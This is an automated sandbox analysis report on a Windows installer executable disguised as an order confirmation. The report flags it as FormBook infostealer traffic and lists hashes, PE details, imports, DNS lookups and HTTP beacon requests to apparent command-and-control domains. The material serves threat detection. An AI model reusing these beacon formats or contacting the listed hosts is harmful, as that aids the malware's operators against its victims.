                                                                                                                                                        Process:C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1359849
                                                                                                                                                        Entropy (8bit):6.90869822423033
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:xpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M0R/upZDud:xT3E53Myyzl0hMf1tr7Caw8M0ROCyo
                                                                                                                                                        MD5:2CFDA9022EA3CDD01F5788BB5E1709BF
                                                                                                                                                        SHA1:57F7EAB42DFA453775E09E4E60D5DBDB904A1E00
                                                                                                                                                        SHA-256:DBB3E69C4F7918F7F2050C4C643DD4362469E7D72B03B0450535D7665696CFC2
                                                                                                                                                        SHA-512:D1332443EBDC25C72C446B73469381D09920AACCC608C2261459D2FB1BAA259956D47D69091E7F390FA509123B3D6BCB272B9E6623203808DFE54E09E6FB1E64
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                        Entropy (8bit):7.97851220387635
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        File size:596473
                                                                                                                                                        MD5:b18e939428b3ffc67c750e2a0988d61a
                                                                                                                                                        SHA1:405cc59b2da9a6187bd65e7c2fa4f9ebdae32111
                                                                                                                                                        SHA256:238dd9cb9b1c235e2babbc3f3b1372da8d76e4d94a4440776814957e0fd09f0b
                                                                                                                                                        SHA512:8b81ec5ec2276ec7ed82e6e696c33b73f416dea29781bab782930550144bde4f45d918514d80f242128848783b3acdeeeacb731504a7a20ee8793df84bfa93e6
                                                                                                                                                        SSDEEP:12288:c18+wXg8XMfLpYKcMUNv6TGNnaf3Ymft0yavIkD:c1wgJDpXcM2STiVRpdD

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x403461
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                        Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        sub esp, 00000184h
                                                                                                                                                        push ebx
                                                                                                                                                        push esi
                                                                                                                                                        push edi
                                                                                                                                                        xor ebx, ebx
                                                                                                                                                        push 00008001h
                                                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                                                        mov dword ptr [esp+10h], 0040A130h
                                                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                                                        call dword ptr [004080B0h]
                                                                                                                                                        call dword ptr [004080C0h]
                                                                                                                                                        and eax, BFFFFFFFh
                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                        mov dword ptr [0042474Ch], eax
                                                                                                                                                        je 00007FAD40A76903h
                                                                                                                                                        push ebx
                                                                                                                                                        call 00007FAD40A79A7Eh
                                                                                                                                                        cmp eax, ebx
                                                                                                                                                        je 00007FAD40A768F9h
                                                                                                                                                        push 00000C00h
                                                                                                                                                        call eax
                                                                                                                                                        mov esi, 004082A0h
                                                                                                                                                        push esi
                                                                                                                                                        call 00007FAD40A799FAh
                                                                                                                                                        push esi
                                                                                                                                                        call dword ptr [004080B8h]
                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                                                        jne 00007FAD40A768DDh
                                                                                                                                                        push 0000000Bh
                                                                                                                                                        call 00007FAD40A79A52h
                                                                                                                                                        push 00000009h
                                                                                                                                                        call 00007FAD40A79A4Bh
                                                                                                                                                        push 00000007h
                                                                                                                                                        mov dword ptr [00424744h], eax
                                                                                                                                                        call 00007FAD40A79A3Fh
                                                                                                                                                        cmp eax, ebx
                                                                                                                                                        je 00007FAD40A76901h
                                                                                                                                                        push 0000001Eh
                                                                                                                                                        call eax
                                                                                                                                                        test eax, eax
                                                                                                                                                        je 00007FAD40A768F9h
                                                                                                                                                        or byte ptr [0042474Fh], 00000040h
                                                                                                                                                        push ebp
                                                                                                                                                        call dword ptr [00408038h]
                                                                                                                                                        push ebx
                                                                                                                                                        call dword ptr [00408288h]
                                                                                                                                                        mov dword ptr [00424818h], eax
                                                                                                                                                        push ebx
                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                        push 00000160h
                                                                                                                                                        push eax
                                                                                                                                                        push ebx
                                                                                                                                                        push 0041FD10h
                                                                                                                                                        call dword ptr [0040816Ch]
                                                                                                                                                        push 0040A1ECh

                                                                                                                                                        Rich Headers

                                                                                                                                                        Programming Language:
                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                        Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8438           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2d000          0x6bc         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x29c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                                                        Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x623c        0x6400    False     0.65859375       data       6.40257705324  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x1274        0x1400    False     0.43359375       data       5.05749598324  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x1a858       0x600     False     0.445963541667   data       4.08975001509  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x25000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x2d000          0x6bc         0x800     False     0.41259765625    data       4.23827605847  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

Name         RVA      Size   Type                                                                           Language  Country
RT_DIALOG    0x2d100  0x100  data                                                                           English   United States
RT_DIALOG    0x2d200  0x11c  data                                                                           English   United States
RT_DIALOG    0x2d31c  0x60   data                                                                           English   United States
RT_MANIFEST  0x2d37c  0x340  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

                                                                                                                                                        Imports

DLL           Import
ADVAPI32.dll  RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll   SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll     IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll  ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll    SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll     SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll  GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/27/21-15:40:13.548456 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.5 | 172.120.228.88
01/27/21-15:40:13.548456 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.5 | 172.120.228.88
01/27/21-15:40:13.548456 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.5 | 172.120.228.88
01/27/21-15:40:40.054194 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49741 | 34.102.136.180 | 192.168.2.5
01/27/21-15:41:43.499735 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49761 | 80 | 192.168.2.5 | 172.120.228.88
01/27/21-15:41:43.499735 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49761 | 80 | 192.168.2.5 | 172.120.228.88
01/27/21-15:41:43.499735 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49761 | 80 | 192.168.2.5 | 172.120.228.88
01/27/21-15:42:11.631048 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49765 | 34.102.136.180 | 192.168.2.5

Network Port Distribution

TCP Packets


UDP Packets

                                                                                                                                                        Jan 27, 2021 15:39:45.538866043 CET5046353192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:45.610472918 CET53504638.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:49.413269997 CET5039453192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:49.477861881 CET53503948.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:50.633255959 CET5853053192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:50.835007906 CET53585308.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:56.556267977 CET5381353192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:56.949820995 CET53538138.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:02.562994957 CET6373253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:02.639822006 CET53637328.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:07.770678043 CET5734453192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:07.866545916 CET53573448.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:12.994759083 CET5445053192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:13.348109007 CET53544508.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.616782904 CET5926153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:18.667355061 CET53592618.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.784562111 CET5715153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:18.848720074 CET53571518.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:23.943500996 CET5941353192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:24.015012026 CET53594138.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:29.308646917 CET6051653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:29.381911039 CET53605168.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:39.808201075 CET5164953192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:39.869888067 CET53516498.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.075090885 CET6508653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:45.219017982 CET53650868.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:50.963036060 CET5643253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:51.322649002 CET53564328.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:56.994911909 CET5292953192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:57.059277058 CET53529298.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:02.182497025 CET6431753192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:02.246251106 CET53643178.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:10.697614908 CET6100453192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:10.935481071 CET53610048.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:16.680869102 CET5689553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:16.745192051 CET53568958.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:22.248065948 CET6237253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:22.306813002 CET53623728.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:22.966398954 CET6151553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:23.028085947 CET53615158.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:23.744988918 CET5667553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:23.808562994 CET53566758.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:24.252789974 CET5717253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:24.309011936 CET53571728.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:24.855230093 CET5526753192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:24.918915033 CET53552678.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:25.630397081 CET5096953192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:25.686964035 CET53509698.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:26.374568939 CET6436253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:26.435890913 CET53643628.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:27.510409117 CET5476653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:27.577373981 CET53547668.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:28.761806965 CET6144653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:28.823378086 CET53614468.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:29.320130110 CET5751553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:29.379723072 CET53575158.8.8.8192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 27, 2021 15:39:45.538866043 CET | 192.168.2.5 | 8.8.8.8 | 0x6dab | Standard query (0) | www.coredigit.net | A (IP address) | IN (0x0001)
Jan 27, 2021 15:39:50.633255959 CET | 192.168.2.5 | 8.8.8.8 | 0x4e6e | Standard query (0) | www.taxandbookkeepingsolutions.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:39:56.556267977 CET | 192.168.2.5 | 8.8.8.8 | 0x85a | Standard query (0) | www.rotalablog.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:02.562994957 CET | 192.168.2.5 | 8.8.8.8 | 0x5c61 | Standard query (0) | www.expand.care | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:07.770678043 CET | 192.168.2.5 | 8.8.8.8 | 0xb8c4 | Standard query (0) | www.alliswell.info | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:12.994759083 CET | 192.168.2.5 | 8.8.8.8 | 0xa17 | Standard query (0) | www.czb878.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:18.784562111 CET | 192.168.2.5 | 8.8.8.8 | 0x3ccc | Standard query (0) | www.brendonellis.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:23.943500996 CET | 192.168.2.5 | 8.8.8.8 | 0x63f4 | Standard query (0) | www.purposelyproductivelab.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:29.308646917 CET | 192.168.2.5 | 8.8.8.8 | 0x10d9 | Standard query (0) | www.ekpays.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:39.808201075 CET | 192.168.2.5 | 8.8.8.8 | 0xcefe | Standard query (0) | www.beachesvr.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:45.075090885 CET | 192.168.2.5 | 8.8.8.8 | 0xcbf1 | Standard query (0) | www.secretlairtoys.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:50.963036060 CET | 192.168.2.5 | 8.8.8.8 | 0xf0b2 | Standard query (0) | www.dmvantalya.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:56.994911909 CET | 192.168.2.5 | 8.8.8.8 | 0x571d | Standard query (0) | www.husum-ferienwohnungen.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:41:02.182497025 CET | 192.168.2.5 | 8.8.8.8 | 0xfd25 | Standard query (0) | www.swiftappliancessc.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:41:10.697614908 CET | 192.168.2.5 | 8.8.8.8 | 0x473a | Standard query (0) | www.state728.com | A (IP address) | IN (0x0001)
Jan 27, 2021 15:41:16.680869102 CET | 192.168.2.5 | 8.8.8.8 | 0x6041 | Standard query (0) | www.coredigit.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 27, 2021 15:39:45.610472918 CET | 8.8.8.8 | 192.168.2.5 | 0x6dab | Name error (3) | www.coredigit.net | none | none | A (IP address) | IN (0x0001)
Jan 27, 2021 15:39:50.835007906 CET | 8.8.8.8 | 192.168.2.5 | 0x4e6e | No error (0) | www.taxandbookkeepingsolutions.com | taxandbookkeepingsolutions.com | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 15:39:50.835007906 CET | 8.8.8.8 | 192.168.2.5 | 0x4e6e | No error (0) | taxandbookkeepingsolutions.com | | 192.254.186.135 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:39:56.949820995 CET | 8.8.8.8 | 192.168.2.5 | 0x85a | No error (0) | www.rotalablog.com | | 118.27.99.25 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:02.639822006 CET | 8.8.8.8 | 192.168.2.5 | 0x5c61 | No error (0) | www.expand.care | expand.care | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 15:40:02.639822006 CET | 8.8.8.8 | 192.168.2.5 | 0x5c61 | No error (0) | expand.care | | 149.210.170.235 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:07.866545916 CET | 8.8.8.8 | 192.168.2.5 | 0xb8c4 | No error (0) | www.alliswell.info | | 51.195.43.214 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:13.348109007 CET | 8.8.8.8 | 192.168.2.5 | 0xa17 | No error (0) | www.czb878.com | | 172.120.228.88 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:18.848720074 CET | 8.8.8.8 | 192.168.2.5 | 0x3ccc | No error (0) | www.brendonellis.com | brendonellis.com | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 15:40:18.848720074 CET | 8.8.8.8 | 192.168.2.5 | 0x3ccc | No error (0) | brendonellis.com | | 192.0.78.25 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:18.848720074 CET | 8.8.8.8 | 192.168.2.5 | 0x3ccc | No error (0) | brendonellis.com | | 192.0.78.24 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:24.015012026 CET | 8.8.8.8 | 192.168.2.5 | 0x63f4 | No error (0) | www.purposelyproductivelab.com | | 3.13.31.214 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:29.381911039 CET | 8.8.8.8 | 192.168.2.5 | 0x10d9 | No error (0) | www.ekpays.com | ekpays.com | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 15:40:29.381911039 CET | 8.8.8.8 | 192.168.2.5 | 0x10d9 | No error (0) | ekpays.com | | 3.0.139.114 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:39.869888067 CET | 8.8.8.8 | 192.168.2.5 | 0xcefe | No error (0) | www.beachesvr.com | beachesvr.com | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 15:40:39.869888067 CET | 8.8.8.8 | 192.168.2.5 | 0xcefe | No error (0) | beachesvr.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:45.219017982 CET | 8.8.8.8 | 192.168.2.5 | 0xcbf1 | No error (0) | www.secretlairtoys.com | secretlairtoys.com | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 15:40:45.219017982 CET | 8.8.8.8 | 192.168.2.5 | 0xcbf1 | No error (0) | secretlairtoys.com | | 192.249.115.168 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:51.322649002 CET | 8.8.8.8 | 192.168.2.5 | 0xf0b2 | No error (0) | www.dmvantalya.com | | 154.204.140.233 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:40:57.059277058 CET | 8.8.8.8 | 192.168.2.5 | 0x571d | No error (0) | www.husum-ferienwohnungen.com | | 46.38.226.47 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:41:02.246251106 CET | 8.8.8.8 | 192.168.2.5 | 0xfd25 | No error (0) | www.swiftappliancessc.com | swiftappliancessc.com | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 15:41:02.246251106 CET | 8.8.8.8 | 192.168.2.5 | 0xfd25 | No error (0) | swiftappliancessc.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:41:10.935481071 CET | 8.8.8.8 | 192.168.2.5 | 0x473a | No error (0) | www.state728.com | | 69.163.224.168 | A (IP address) | IN (0x0001)
Jan 27, 2021 15:41:16.745192051 CET | 8.8.8.8 | 192.168.2.5 | 0x6041 | Name error (3) | www.coredigit.net | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.taxandbookkeepingsolutions.com
• www.rotalablog.com
• www.expand.care
• www.alliswell.info
• www.czb878.com
• www.brendonellis.com
• www.purposelyproductivelab.com
• www.ekpays.com
• www.beachesvr.com
• www.secretlairtoys.com
• www.dmvantalya.com
• www.husum-ferienwohnungen.com
• www.swiftappliancessc.com
• www.state728.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49732 | 192.254.186.135 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:39:51.025964975 CET | 5322 | OUT | GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1
Host: www.taxandbookkeepingsolutions.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:39:52.432456970 CET | 5336 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jan 2021 14:39:51 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://taxandbookkeepingsolutions.com/bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH
X-Endurance-Cache-Level: 2
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49733 | Destination IP: 118.27.99.25 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:39:57.234358072 CET | 5337 | OUT | GET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1
    Host: www.rotalablog.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 27, 2021 15:39:57.515944004 CET | 5338 | IN | HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Wed, 27 Jan 2021 14:39:57 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: close
    Location: https://www.rotalablog.com/bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49743 | Destination IP: 154.204.140.233 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
